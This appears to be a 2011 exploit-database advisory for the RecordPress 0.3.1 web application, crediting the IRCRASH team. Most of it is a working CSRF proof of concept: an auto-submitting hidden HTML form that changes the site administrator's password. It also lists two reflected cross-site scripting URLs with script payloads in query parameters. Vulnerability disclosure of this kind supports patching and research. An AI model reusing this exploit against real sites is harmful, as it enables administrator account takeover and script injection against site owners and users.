RecordPress 0.3.1 Multiple Vulnerabilities

Published: 2011-03-09 CVE: N/A OSVDB-ID: N/A
  1. ----------------------------------------------------------------
  2. WebApplication : RecordPress 0.3.1
  3. Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
  4. Risk of use : Medium
  5. ----------------------------------------------------------------
  6. Producer Website : http://www.recordpress.org/
  7. ----------------------------------------------------------------
  8. Discovered by : Khashayar Fereidani
  9. Team Website : http://IRCRASH.COM
  10. Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
  11. English Forums : Http://IRCRASH.COM/forums/
  12. Email : irancrash [ a t ] gmail [ d o t ] com
  13. Facebook : http://facebook.com/fereidani
  14. ----------------------------------------------------------------
  15.  
  16. CSRF For Change Admin Password :
  17.  
  18. <body onLoad=javascript:document.form.submit()>
  19.  
  20. <form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";
  21.  
  22. method="POST" name="form">
  23.  
  24. <input type="hidden" name="formusername" value="admin">
  25.  
  26. <input type="hidden" name="formname" value="admin">
  27.  
  28. <input type="hidden" name="formemail" value="[email protected]">
  29.  
  30. <input type="hidden" name="formpass" value="password">
  31.  
  32. <input type="hidden" name="formpass2" value="password">
  33.  
  34. <input type="hidden" name="formadminstatus" value="2">
  35.  
  36. <input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">
  37.  
  38.  
  39. </form>
  40. </body>
  41. </html>
  42.  
  43. ------------------------------------------------
  44.  
  45. Cross Site Scripting Vulnerabilities :
  46.  
  47. http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
  48. http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>
  49.  

Other Refrences

EXPLOIT-DB Advistory : http://www.exploit-db.com/exploits/16950/